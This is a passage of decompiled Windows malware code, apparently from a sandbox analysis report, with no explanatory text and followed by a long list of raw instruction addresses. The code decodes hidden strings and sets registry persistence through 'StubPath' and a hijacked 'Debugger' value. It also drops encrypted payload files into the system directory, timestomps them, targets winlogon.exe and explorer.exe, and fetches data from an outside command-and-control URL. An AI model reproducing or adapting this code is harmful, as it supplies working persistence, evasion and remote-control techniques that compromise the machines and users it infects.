																									RegSetValueExA(_t780[0x20], ??, ??, ??, ??, ??);
																									RegCloseKey(_t780[0x1b]);
																									 *_t780 = 1;
																									goto L211;
																								}
																							}
																							_t780[0x16] = _t780[0x19].dwLowDateTime;
																							_t780[0x17] = _t780[0x1a];
																							_push(8);
																							_push(_t778);
																							_push(0xb);
																							_push(0);
																							_push("UseExtProfile");
																							goto L207;
																						}
																						__eflags = E004014D8( &(_t780[0x19]),  &(_t780[0x16])) - 0x152ab;
																						if(__eflags <= 0) {
																							goto L201;
																						}
																						goto L198;
																					}
																					_push(3);
																					_push(0);
																					_t485 = E0040211B("grazie.gif", 0);
																					__eflags = _t485;
																					if(_t485 == 0) {
																						goto L196;
																					}
																					_t780[0x16] = _t780[0x19].dwLowDateTime;
																					_t780[0x17] = _t780[0x1a];
																					_push(8);
																					_push(_t778);
																					_push(0xb);
																					_push(0);
																					_push("ConnPred");
																					goto L207;
																				}
																				_t487 = E00402427(__eflags);
																				__eflags = _t487;
																				if(_t487 != 0) {
																					goto L208;
																				}
																				_t489 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																				_t762 = 0;
																				__eflags = _t489;
																				_t690 = _t489;
																				if(_t489 != 0) {
																					_t494 = E00401E00(_t489,  &(_t780[0x15]), 2);
																					__eflags = _t494 - 2;
																					if(_t494 == 2) {
																						_t762 = 1;
																					}
																				}
																				E00401F59(_t690);
																				__eflags = _t762;
																				if(_t762 == 0) {
																					 *0x412080 = 0;
																				} else {
																					 *0x412070 = _t780[0x19];
																					_t493 = 0;
																					__eflags = _t780[0x14] - 0x49;
																					 *0x412074 = _t780[0x1a];
																					if(_t780[0x14] == 0x49) {
																						__eflags = _t780[0x14] - 0x54;
																						if(_t780[0x14] == 0x54) {
																							_t493 = 1;
																						}
																					}
																					 *0x412080 = _t493;
																				}
																				goto L193;
																			}
																			_t496 = E004014D8(_t778, _t755);
																			__eflags = _t496 - 0x152ab;
																			if(_t496 <= 0x152ab) {
																				goto L196;
																			}
																			goto L182;
																			L212:
																			_t277 =  &(_t780[0xc]);
																			 *_t277 = _t780[0xc] + 1;
																			__eflags =  *_t277;
																			goto L213;
																		}
																	}
																	_t497 = 0x4071e0;
																	while(1) {
																		__eflags = _t497 - 0x407214;
																		if(_t497 >= 0x407214) {
																			break;
																		}
																		 *_t497 =  *_t497 ^ 0x000000d4;
																		_t497 =  &(_t497[1]);
																	}
																	_t498 = 0x4071c3;
																	while(1) {
																		__eflags = _t498 - 0x4071cf;
																		if(_t498 >= 0x4071cf) {
																			break;
																		}
																		 *_t498 =  *_t498 ^ 0x000000d4;
																		_t498 =  &(_t498[1]);
																	}
																	_t764 =  &(_t780[0x26]);
																	_t499 = RegCreateKeyA(0x80000002, 0x4071e0, _t764);
																	__eflags = _t499;
																	if(_t499 == 0) {
																		RegSetValueExA(_t780[0x2b], 0x4071c3, 0, 4,  &(_t780[0x28]), 4);
																		RegCloseKey(_t780[0x26]);
																	}
																	_t500 = 0x4071a0;
																	while(1) {
																		__eflags = _t500 - 0x4071c2;
																		if(_t500 >= 0x4071c2) {
																			break;
																		}
																		 *_t500 =  *_t500 ^ 0x000000d4;
																		_t500 =  &(_t500[1]);
																	}
																	_t501 = 0x407177;
																	while(1) {
																		__eflags = _t501 - 0x407188;
																		if(_t501 >= 0x407188) {
																			break;
																		}
																		 *_t501 =  *_t501 ^ 0x000000d4;
																		_t501 =  &(_t501[1]);
																	}
																	_t502 = 0x407160;
																	while(1) {
																		__eflags = _t502 - 0x407176;
																		if(_t502 >= 0x407176) {
																			break;
																		}
																		 *_t502 =  *_t502 ^ 0x000000d4;
																		_t502 =  &(_t502[1]);
																	}
																	_t503 = 0x40714a;
																	while(1) {
																		__eflags = _t503 - 0x40715f;
																		if(_t503 >= 0x40715f) {
																			break;
																		}
																		 *_t503 =  *_t503 ^ 0x000000d4;
																		_t503 =  &(_t503[1]);
																	}
																	_t504 = 0x407135;
																	while(1) {
																		__eflags = _t504 - 0x407149;
																		if(_t504 >= 0x407149) {
																			break;
																		}
																		 *_t504 =  *_t504 ^ 0x000000d4;
																		_t504 =  &(_t504[1]);
																	}
																	_t505 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t764);
																	__eflags = _t505;
																	if(_t505 == 0) {
																		_t694 =  &(_t780[0x28]);
																		RegSetValueExA(_t780[0x2b], 0x407177, 0, 4, _t694, 4);
																		RegSetValueExA(_t780[0x2b], 0x407160, 0, 4, _t694, 4);
																		RegSetValueExA(_t780[0x2b], 0x40714a, 0, 4, _t694, 4);
																		RegSetValueExA(_t780[0x2b], 0x407135, 0, 4, _t694, 4);
																		RegCloseKey(_t780[0x26]);
																	}
																	_t506 = 0x4070c0;
																	while(1) {
																		__eflags = _t506 - 0x407134;
																		if(_t506 >= 0x407134) {
																			break;
																		}
																		 *_t506 =  *_t506 ^ 0x000000d4;
																		_t506 =  &(_t506[1]);
																	}
																	_t507 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t764);
																	__eflags = _t507;
																	if(_t507 != 0) {
																		goto L173;
																	}
																	_t509 = E00401000(0x8000);
																	_t780[0x1d] = 0x4000;
																	_t765 = _t509;
																	_t510 = 0x407080;
																	_t780[0x27] = 0x4000;
																	while(1) {
																		__eflags = _t510 - 0x4070a4;
																		if(_t510 >= 0x4070a4) {
																			break;
																		}
																		 *_t510 =  *_t510 ^ 0x000000d4;
																		_t510 =  &(_t510[1]);
																	}
																	_t780[0xd] = 0;
																	while(1) {
																		_t224 =  &(_t765[0x4000]); // 0x4000
																		_t692 = _t224;
																		_t514 = RegEnumValueA(_t780[0x2d], _t780[0x13], _t765,  &(_t780[0x2b]), 0,  &(_t780[0x1e]), _t224,  &(_t780[0x1d]));
																		__eflags = _t514;
																		if(_t514 != 0) {
																			break;
																		}
																		__eflags = _t780[0x1c] - 1;
																		if(_t780[0x1c] == 1) {
																			_t516 = E00401311(_t692, 0x40708d);
																			__eflags = _t516;
																			if(_t516 != 0) {
																				RegDeleteValueA(_t780[0x27], _t765);
																			}
																		}
																		_t219 =  &(_t780[0xd]);
																		 *_t219 = _t780[0xd] + 1;
																		__eflags =  *_t219;
																		_t780[0x1d] = 0x4000;
																		_t780[0x27] = 0x4000;
																	}
																	_t693 =  &(_t780[0x55a]);
																	_t519 = wsprintfA(_t765, 0x407080, _t693) + 1;
																	__eflags = _t519;
																	_t780 =  &(_t780[3]);
																	RegSetValueExA(_t780[0x2b], _t693, 0, 1, _t765, _t519);
																	E00401029(_t765);
																	RegCloseKey(_t780[0x26]);
																	goto L173;
																}
																_t537 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t780[0x26]));
																__eflags = _t537;
																if(_t537 != 0) {
																	goto L133;
																}
																goto L130;
															}
															__eflags = _t382 - 0xffffffff;
															if(_t382 == 0xffffffff) {
																goto L122;
															}
															L121:
															WriteFile(_t722, 0x408840, 0x5e00,  &(_t780[0x28]), 0);
															CloseHandle(_t780[0x28]);
															goto L123;
														}
														__eflags = _t379 - 0xffffffff;
														if(_t379 != 0xffffffff) {
															goto L121;
														}
														goto L119;
													}
													__eflags = _t545 + 1;
													if(_t545 + 1 != 0) {
														L102:
														WriteFile(_t780[0x2c], 0x40e640, 0x1400,  &(_t780[0x28]), 0);
														__eflags = _t780[3];
														if(_t780[3] != 0) {
															SetFileTime(_t780[0x2b],  &(_t780[0x21]),  &(_t780[0x22]),  &(_t780[0x23]));
														}
														CloseHandle(_t780[0x28]);
														_t780[9] = 1;
														_push(0);
														_push("winlogon.exe");
														_t696 =  &(_t780[0x388]);
														_t551 = E0040318D(_t696);
														_t780 =  &(_t780[3]);
														__eflags = _t551;
														if(_t551 == 0) {
															_push(0);
															_push("explorer.exe");
															E0040318D(_t696);
															_t780 =  &(_t780[3]);
														}
														_push(0);
														_push("kernel32.dll");
														_push(_t696);
														L116:
														E0040318D();
														_t780 =  &(_t780[3]);
														CreateFileA( &(_t780[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
														goto L117;
													}
													goto L114;
												}
												__eflags = _t371 + 1;
												if(_t371 + 1 != 0) {
													goto L102;
												}
												goto L111;
											}
											L108:
											_t780[9] = 1;
											_push(0);
											_push("kernel32.dll");
											_push( &(_t780[0x388]));
											goto L116;
										}
										__eflags = _t367 + 1;
										if(_t367 + 1 == 0) {
											goto L107;
										}
										goto L102;
									} else {
										_t766 =  &(_t780[0x16a]);
										_t559 = GetTempFileNameA(_t677, "tmp", 0, _t766);
										__eflags = _t559;
										if(_t559 == 0) {
											goto L100;
										}
										_t560 = CreateFileA(_t766, 0x40000000, 0, 0, 2, 0x80, 0);
										_t780[0x28] = _t560;
										__eflags = _t560;
										if(_t560 == 0) {
											goto L100;
										}
										__eflags = _t560 + 1;
										if(_t560 + 1 == 0) {
											goto L100;
										}
										L97:
										WriteFile(_t780[0x2c], _t780[8], _t777,  &(_t780[0x28]), 0);
										CloseHandle(_t780[0x28]);
										CreateFileA( &(_t780[0x170]), 0x80000000, 1, 0, 3, 0, 0);
										_t767 =  &(_t780[0x1ee]);
										_t746 =  &(_t780[0x162]);
										_t716 =  &(_t780[0x278]);
										while(1) {
											__eflags = _t767 - _t716;
											if(_t767 >= _t716) {
												goto L100;
											}
											_t568 = _t780[0x1ee] & 0x000000ff ^  *_t746;
											_t746 =  &(_t746[0]);
											 *_t767 = _t568;
											_t767 =  &(_t767[1]);
										}
										goto L100;
									}
								}
								_t768 =  &(_t780[0x16a]);
								_push(_t768);
								_push(0);
								_push(0x411040);
								_push(_t676);
								L00405E90();
								__eflags = _t361;
								if(_t361 == 0) {
									goto L92;
								}
								_push(0);
								_push(0x80);
								_push(2);
								_push(0);
								_push(0);
								_push(0x40000000);
								_push(_t768);
								L00405DB0();
								_t780[0x28] = _t361;
								__eflags = _t361;
								if(_t361 == 0) {
									goto L92;
								}
								__eflags = _t361 + 1;
								if(_t361 + 1 != 0) {
									goto L97;
								}
								goto L92;
							}
							RegDeleteValueA(_t354, "SubshellState");
							RegCloseKey(_t780[0x26]);
							_t769 =  &(_t780[0x1ee]);
							_t747 =  &(_t780[0x162]);
							_t717 =  &(_t780[0x278]);
							while(1) {
								__eflags = _t769 - _t717;
								if(_t769 >= _t717) {
									break;
								}
								_t595 = _t780[0x1ee] & 0x000000ff ^  *_t769;
								_t769 =  &(_t769[0]);
								 *_t747 = _t595;
								_t747 =  &(_t747[1]);
							}
							_push( *0x4120b0);
							_t574 =  &(_t780[0x163]);
							_push(_t574);
							L00405E50();
							__eflags = _t574;
							if(_t574 != 0) {
								L67:
								_t697 =  &(_t780[0x16b]);
								SetFileAttributesA(_t697, 0x80);
								DeleteFileA(_t697);
								goto L81;
							}
							_push( &(_t780[0x55a]));
							_t578 =  &(_t780[0x1ac]);
							_push(_t578);
							L00405E50();
							__eflags = _t578;
							if(_t578 == 0) {
								_t580 = CreateFileA( &(_t780[0x170]), 0x80000000, 1, 0, 3, 0, 0);
								_t780[0x28] = _t580;
								__eflags = _t580;
								if(_t580 == 0) {
									goto L67;
								}
								__eflags = _t580 - 0xffffffff;
								if(_t580 == 0xffffffff) {
									goto L67;
								}
								_t581 = GetFileSize(_t580, 0);
								_t780[0x1d] = _t581;
								__eflags = _t581 - _t777;
								if(_t581 == _t777) {
									_t584 = E00401000(_t777);
									_t770 = _t584;
									ReadFile(_t780[0x2c], _t584, _t777,  &(_t780[0x28]), 0);
									_t698 = _t780[0x1d];
									_t748 = _t770;
									_t756 = _t780[5];
									__eflags = _t770 - _t770 + _t698;
									while(__eflags < 0) {
										_t718 =  *_t748 & 0x000000ff;
										__eflags = _t780[0x162] - ( *_t756 & 0x000000ff);
										if(__eflags == 0) {
											__eflags = _t718;
										}
										if(__eflags == 0) {
											_t748 =  &(_t748[1]);
											_t756 =  &(_t756[1]);
											__eflags = _t748 - _t770 + _t698;
											continue;
										} else {
											E00401029(_t770);
											goto L71;
										}
									}
									E00401029(_t770);
									goto L100;
								}
								L71:
								CloseHandle(_t780[0x28]);
							}
							goto L67;
						}
						_t699 =  &(_t780[0x3cb]);
						_t596 = GetSystemDirectoryA(_t699, 0x104);
						_push( *0x412090);
						_push(0x41103e);
						_push(_t699);
						L00405E30();
						_push(_t596);
						L00405E30();
						_t597 = 0x407260;
						while(1) {
							__eflags = _t597 - 0x407286;
							if(_t597 >= 0x407286) {
								break;
							}
							 *_t597 =  *_t597 ^ 0x000000d4;
							_t597 =  &(_t597[1]);
						}
						_t598 = CreateMutexA(0, 0, "h`r@");
						_t780[0x28] = _t598;
						__eflags = _t598;
						if(_t598 == 0) {
							Sleep(0x7d0);
						} else {
							WaitForSingleObject(_t598, 0x2710);
							CloseHandle(_t780[0x28]);
						}
						_t700 =  &(_t780[0x3cb]);
						SetFileAttributesA(_t700, 0x80);
						_t600 = CreateFileA(_t700, 0x40000000, 0, 0, 2, 0x80, 0);
						_t780[0x28] = _t600;
						__eflags = _t600;
						if(_t600 == 0) {
							L60:
							RegCloseKey(_t780[0x26]);
							RegDeleteKeyA(0x80000001,  &(_t780[0x40e]));
							goto L61;
						} else {
							__eflags = _t600 - 0xffffffff;
							if(_t600 == 0xffffffff) {
								goto L60;
							}
							WriteFile(_t600, 0x4072a0, 0x800,  &(_t780[0x28]), 0);
							_t605 = E004010B2();
							_t780[6] = _t605;
							__eflags = _t605;
							if(_t605 == 0) {
								_t780[6] = 0xc6;
							}
							_t607 = E00401000(_t777 + 0x64);
							 *((char*)(_t607 + _t777)) = 0;
							_t757 = _t607;
							_t771 = _t607;
							_t750 = _t780[5];
							_t608 = _t607 + _t777;
							while(1) {
								__eflags = _t771 - _t608;
								if(_t771 >= _t608) {
									break;
								}
								_t633 = _t780[6] & 0x000000ff ^  *_t750;
								_t750 =  &(_t750[0]);
								 *_t771 = _t633;
								_t771 = _t771 + 1;
								_t608 = _t757 + _t777;
							}
							_t609 =  &(_t780[0x55a]);
							_t701 = _t757 + _t777;
							_push(_t609);
							L00405E40();
							_t772 = _t701 +  &(_t609[1]);
							__eflags = _t772 - _t701 + 0x64;
							while(__eflags < 0) {
								 *_t772 = E004010B2();
								_t772 = _t772 + 1;
								_t93 = _t777 + 0x64; // 0x64
								__eflags = _t772 - _t757 + _t93;
							}
							 *(_t757 + _t777 + 1) = _t777;
							_t703 = _t757 + _t777;
							_push( &(_t780[0x55a]));
							_t773 = _t703;
							_push( &(_t703[1]));
							L00405E20();
							_t612 =  &(_t703[0x19]);
							while(1) {
								__eflags = _t773 - _t612;
								if(_t773 >= _t612) {
									break;
								}
								 *_t773 =  *_t773 ^ _t780[6] & 0x000000ff;
								_t773 =  &(_t773[0]);
								_t102 = _t777 + 0x64; // 0x64
								_t612 = _t757 + _t102;
							}
							WriteFile(_t780[0x2c], _t757, _t777 + 0x64,  &(_t780[0x28]), 0);
							E00401029(_t757);
							__eflags = _t780[3];
							if(_t780[3] != 0) {
								SetFileTime(_t780[0x2b],  &(_t780[0x21]),  &(_t780[0x22]),  &(_t780[0x23]));
							}
							CloseHandle(_t780[0x28]);
							_t704 =  &(_t780[0x3d0]);
							CreateFileA(_t704, 0x80000000, 1, 0, 3, 0, 0);
							E00401251(_t780[0x26]);
							_t780[0x27] = 1;
							_t622 = RegSetValueExA(_t780[0x2b], "IsInstalled", 0, 4,  &(_t780[0x28]), 4);
							_push(_t704);
							L00405E40();
							_t623 = _t622 + 1;
							__eflags = _t623;
							RegSetValueExA(_t780[0x2b], "StubPath", 0, 1, _t704, _t623);
							_t780[0xa] = 1;
							goto L60;
						}
					}
					__eflags =  *((char*)(_t779 + 0x1e8));
					if( *((char*)(_t779 + 0x1e8)) != 0) {
						_push(_t674);
						_t636 = _t779 + 0x1bc;
						_push(_t636);
						L00405E20();
						while(1) {
							_t705 = _t779 + 0x1b8;
							_push(_t705);
							L00405E40();
							__eflags = _t636 - 0xf;
							if(_t636 > 0xf) {
								goto L30;
							}
							_t636 = _t779 + 0x1e8;
							_push(_t636);
							_push(_t705);
							L00405E30();
						}
						goto L30;
					}
					goto L26;
				} else {
					_t706 = _t779 + 0x123c;
					_t637 = GetSystemDirectoryA(_t706, 0x104);
					_push( *0x4120a0);
					_push(0x41103e);
					_push(_t706);
					L00405E30();
					_push(_t637);
					L00405E30();
					_t638 = 0x407ae0;
					L2:
					if(_t638 < 0x407b06) {
						 *_t638 =  *_t638 ^ 0x000000d4;
						_t638 =  &(_t638[1]);
						goto L2;
					}
					_t639 = CreateMutexA(0, 0, 0x407ae0);
					 *(_t779 + 0xa0) = _t639;
					__eflags = _t639;
					if(_t639 == 0) {
						Sleep(0x7d0);
					} else {
						WaitForSingleObject(_t639, 0x2710);
						CloseHandle( *(_t779 + 0xa0));
					}
					_t707 = _t779 + 0x123c;
					SetFileAttributesA(_t707, 0x80);
					_t641 = CreateFileA(_t707, 0x40000000, 0, 0, 2, 0x80, 0);
					 *(_t779 + 0xa0) = _t641;
					__eflags = _t641;
					if(_t641 == 0) {
						L23:
						RegCloseKey( *(_t779 + 0x98));
						goto L24;
					} else {
						__eflags = _t641 - 0xffffffff;
						if(_t641 != 0xffffffff) {
							WriteFile(_t641, 0x407b20, 0xc00, _t779 + 0xa0, 0);
							_t644 = E004010B2();
							 *(_t779 + 0x1b) = _t644;
							__eflags = _t644;
							if(_t644 == 0) {
								 *(_t779 + 0x1b) = 0x66;
							}
							_t646 = E00401000(_t777 + 0x64);
							 *((char*)(_t646 + _t777)) = 0;
							_t758 = _t646;
							_t774 = _t646;
							_t753 =  *(_t779 + 0x14);
							_t647 = _t646 + _t777;
							L12:
							__eflags = _t774 - _t647;
							if(_t774 < _t647) {
								_t671 =  *(_t779 + 0x1b) & 0x000000ff ^  *_t753;
								_t753 =  &(_t753[0]);
								 *_t774 = _t671;
								_t774 = _t774 + 1;
								_t647 = _t758 + _t777;
								goto L12;
							}
							_t648 = _t779 + 0x1568;
							_t708 = _t758 + _t777;
							_push(_t648);
							L00405E40();
							_t775 = _t708 + _t648 + 5;
							__eflags = _t775 - _t708 + 0x64;
							while(__eflags < 0) {
								 *_t775 = E004010B2();
								_t775 = _t775 + 1;
								_t21 = _t777 + 0x64; // 0x64
								__eflags = _t775 - _t758 + _t21;
							}
							 *(_t758 + _t777 + 1) = _t777;
							_t710 = _t758 + _t777;
							_push(_t779 + 0x1568);
							_t776 = _t710;
							_push( &(_t710[1]));
							L00405E20();
							_t651 =  &(_t710[0x19]);
							while(1) {
								__eflags = _t776 - _t651;
								if(_t776 >= _t651) {
									break;
								}
								 *_t776 =  *_t776 ^  *(_t779 + 0x1b) & 0x000000ff;
								_t776 =  &(_t776[0]);
								_t30 = _t777 + 0x64; // 0x64
								_t651 = _t758 + _t30;
							}
							WriteFile( *(_t779 + 0xb0), _t758, _t777 + 0x64, _t779 + 0xa0, 0);
							E00401029(_t758);
							__eflags =  *(_t779 + 0xc);
							if( *(_t779 + 0xc) != 0) {
								SetFileTime( *(_t779 + 0xac), _t779 + 0x84, _t779 + 0x88, _t779 + 0x8c);
							}
							CloseHandle( *(_t779 + 0xa0));
							_t711 = _t779 + 0x1250;
							CreateFileA(_t711, 0x80000000, 1, 0, 3, 0, 0);
							RegDeleteValueA( *(_t779 + 0x9c), "Debugger");
							_t660 = E00401251( *(_t779 + 0x98));
							_push(_t711);
							L00405E40();
							_t661 = _t660 + 1;
							__eflags = _t661;
							RegSetValueExA( *(_t779 + 0xac), "Debugger", 0, 1, _t711, _t661);
							 *(_t779 + 0x2c) = 1;
						}
						goto L23;
					}
				}
			}

0x00404594
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
